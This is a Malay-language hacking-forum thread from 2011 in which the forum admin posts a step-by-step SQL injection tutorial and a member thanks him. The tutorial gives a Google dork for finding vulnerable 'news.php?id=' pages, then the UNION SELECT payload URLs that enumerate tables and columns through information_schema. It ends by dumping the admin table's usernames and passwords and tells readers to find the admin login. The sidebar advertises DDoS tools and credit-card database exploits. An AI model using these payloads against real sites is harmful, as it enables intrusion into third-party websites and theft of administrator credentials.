Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 Sql Injection Tutorial

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2620
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: Sql Injection Tutorial   Mon Jul 04, 2011 3:19 pm

here we go...

[You must be registered and logged in to see this image.]


Sql Injection Tutorial
>>Info<<

Kata kunci yang perlu diketahui
-------------------------------
karakter: ', -
comments: /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x


Google Dork yang akan di gunakan ialah "inurl:news.php?id="

Langkah Pertama

[site]/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.

contoh:

code:

[site]/news.php?id=1'
atau
[site]/news.php?id=-1

contoh error:
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

Langkah Kedua

Cari jumlah table yang ada di dalam database.
----tambahkan +order+by+1-- diakhir url

Contoh:

Code:
[site]/news.php?id=1+order+by+1--
atau
[site]/news.php?id=1+order+by+1/* periksa secara bepringkat
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*cari sehingga error keluar

untuk tutorial ini jumlah table yg diperolehi ialah 3.

Langkah Ketiga

Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
-----perintah yang akan digunakan: union+select+1,2,3--

Contoh: angka 2 keluar.

kemudian kita masukkan version() di angka 2,

contoh:

[site]/news.php?id=1+union+select+1,version(),3--

dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log

------
|info|
------

database() = untuk lihat name database yang digunakan
version() = untuk lihat version msql yang digunakan

Langkah Keempat

untuk nampakkan nama2 table yang ada di wenb tersebut, perintah

Table_name ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.

contoh:

[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Langkah KeLima

Keluarkan kesemua isi yang ada di dalam table tersebut,

group_concat(table_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables+where+table_schema=database() ---> Masukan selepas angka yang terakhir.

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

Langkah Ke Enam

Keluar kan kandungan yang ada didalam TABLE

group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHEXA--
|
|
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)


------
|info|
------

Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> [You must be registered and logged in to see this link.]
-----> [You must be registered and logged in to see this link.]

Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

Langkah Ketujuh

Keluarkan hasil isi yang kita berjaya peroleh dari table ADMIN

concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column

Contoh:

[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--

Dan kita akan peroleh username dan password admin untuk website tersebut.

Langkah Terakhir:

Cari Login untuk admin..


Selamat Mencuba.....


Source : [You must be registered and logged in to see this link.]
Back to top Go down
View user profile http://malaysia.1talk.net
sucide_bomber
New User
New User


Posts : 23
Points : 2052
Reputation : 0
Join date : 20/05/2011
Location Location : l4nd 0f h34d hunt3r

PostSubject: Re: Sql Injection Tutorial   Tue Jul 19, 2011 2:56 pm

Twisted Evil r0x...thanks MASTER...dah lama tunggu..akhirnya dapat juga tutorial ni...
Back to top Go down
View user profile
 
Sql Injection Tutorial
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: h4ck3d :: Tutorials-
Jump to: